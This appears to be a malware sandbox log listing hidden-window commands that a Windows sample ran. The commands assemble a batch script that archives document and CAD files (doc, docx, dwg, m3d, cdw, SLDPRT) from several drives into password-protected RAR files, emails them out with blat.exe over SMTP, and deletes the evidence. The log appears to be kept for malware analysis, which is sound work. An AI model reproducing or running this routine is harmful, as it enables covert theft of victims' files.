- '%WINDIR%\syswow64\cmd.exe' /c echo>>%APPDATA%\Windows\find.cmd %APPDATA%\Windows\blat.exe -to %mail-in% -f "DOCX-C<%mail-out%>" -server %smtp% -port 587 -u %mail-out% -pw %pass-out% -subject "Document dwbplvnegg/user" ...' (with hidden window)
- '%WINDIR%\syswow64\cmd.exe' /c echo>>%APPDATA%\Windows\find.cmd del /q /f %APPDATA%\Windows\pdf-d.rar' (with hidden window)
- '%WINDIR%\syswow64\cmd.exe' /c echo>>%APPDATA%\Windows\find.cmd del /q /f %APPDATA%\Windows\password.txt' (with hidden window)
- '%WINDIR%\syswow64\cmd.exe' /c echo>>%APPDATA%\Windows\find.cmd del /q /f %APPDATA%\Windows\cdw-d.rar' (with hidden window)
- '%WINDIR%\syswow64\cmd.exe' /c echo>>%APPDATA%\Windows\find.cmd %APPDATA%\Windows\blat.exe -to %mail-in% -f "cdw-D<%mail-out%>" -server %smtp% -port 587 -u %mail-out% -pw %pass-out% -subject "Document dwbplvnegg/user" -b...' (with hidden window)
- '%WINDIR%\syswow64\cmd.exe' /c echo>>%APPDATA%\Windows\find.cmd %APPDATA%\Windows\driver.exe a -r -ep -hplimpid2903392 %APPDATA%\Windows\m3d-c.rar C:\*.m3d /y' (with hidden window)
- '%WINDIR%\syswow64\cmd.exe' /c echo>>%APPDATA%\Windows\find.cmd del /q /f %APPDATA%\Windows\wbpv.exe' (with hidden window)
- '%WINDIR%\syswow64\cmd.exe' /c echo>>%APPDATA%\Windows\find.cmd del /q /f %APPDATA%\Windows\dwg-d.rar' (with hidden window)
- '%WINDIR%\syswow64\cmd.exe' /c echo>>%APPDATA%\Windows\find.cmd %APPDATA%\Windows\blat.exe -to %mail-in% -f "dwg-D<%mail-out%>" -server %smtp% -port 587 -u %mail-out% -pw %pass-out% -subject "Document dwbplvnegg/user" -b...' (with hidden window)
- '%WINDIR%\syswow64\cmd.exe' /c echo>>%APPDATA%\Windows\find.cmd %APPDATA%\Windows\driver.exe a -r -ep -hplimpid2903392 %APPDATA%\Windows\doc-c.rar C:\*.doc /y' (with hidden window)
- '%WINDIR%\syswow64\cmd.exe' /c echo>>%APPDATA%\Windows\find.cmd %APPDATA%\Windows\driver.exe a -r -ep -hplimpid2903392 %APPDATA%\Windows\dwg-d.rar D:\*.dwg /y' (with hidden window)
- '%WINDIR%\syswow64\cmd.exe' /c echo>>%APPDATA%\Windows\find.cmd del /q /f %APPDATA%\Windows\m3d-d.rar' (with hidden window)
- '%WINDIR%\syswow64\cmd.exe' /c echo>>%APPDATA%\Windows\find.cmd %APPDATA%\Windows\blat.exe -to %mail-in% -f "DOC-C<%mail-out%>" -server %smtp% -port 587 -u %mail-out% -pw %pass-out% -subject "Document dwbplvnegg/user" -b...' (with hidden window)
- '%WINDIR%\syswow64\cmd.exe' /c echo>>%APPDATA%\Windows\find.cmd %APPDATA%\Windows\blat.exe -to %mail-in% -f "m3d-D<%mail-out%>" -server %smtp% -port 587 -u %mail-out% -pw %pass-out% -subject "Document dwbplvnegg/user" -b...' (with hidden window)
- '%WINDIR%\syswow64\cmd.exe' /c echo>>%APPDATA%\Windows\find.cmd %APPDATA%\Windows\driver.exe a -r -ep -hplimpid2903392 %APPDATA%\Windows\m3d-d.rar D:\*.m3d /y' (with hidden window)
- '%WINDIR%\syswow64\cmd.exe' /c echo>>%APPDATA%\Windows\find.cmd del /q /f %APPDATA%\Windows\doc-c.rar' (with hidden window)
- '%WINDIR%\syswow64\cmd.exe' /c echo>>%APPDATA%\Windows\find.cmd del /q /f %APPDATA%\Windows\SLDPRT-d.rar' (with hidden window)
- '%WINDIR%\syswow64\cmd.exe' /c echo>>%APPDATA%\Windows\find.cmd %APPDATA%\Windows\blat.exe -to %mail-in% -f "SLDPRT-D<%mail-out%>" -server %smtp% -port 587 -u %mail-out% -pw %pass-out% -subject "Document dwbplvnegg/user"...' (with hidden window)
- '%WINDIR%\syswow64\cmd.exe' /c echo>>%APPDATA%\Windows\find.cmd %APPDATA%\Windows\driver.exe a -r -ep -hplimpid2903392 %APPDATA%\Windows\docx-c.rar C:\*.docx /y' (with hidden window)
- '%WINDIR%\syswow64\cmd.exe' /c echo>>%APPDATA%\Windows\find.cmd %APPDATA%\Windows\driver.exe a -r -ep -hplimpid2903392 %APPDATA%\Windows\SLDPRT-d.rar D:\*.SLDPRT /y' (with hidden window)
- '%WINDIR%\syswow64\cmd.exe' /c echo>>%APPDATA%\Windows\find.cmd %APPDATA%\Windows\driver.exe a -r -ep -hplimpid2903392 %APPDATA%\Windows\cdw-e.rar E:\*.cdw /y' (with hidden window)
- '%WINDIR%\syswow64\cmd.exe' /c ""%APPDATA%\Windows\find.cmd" "' (with hidden window)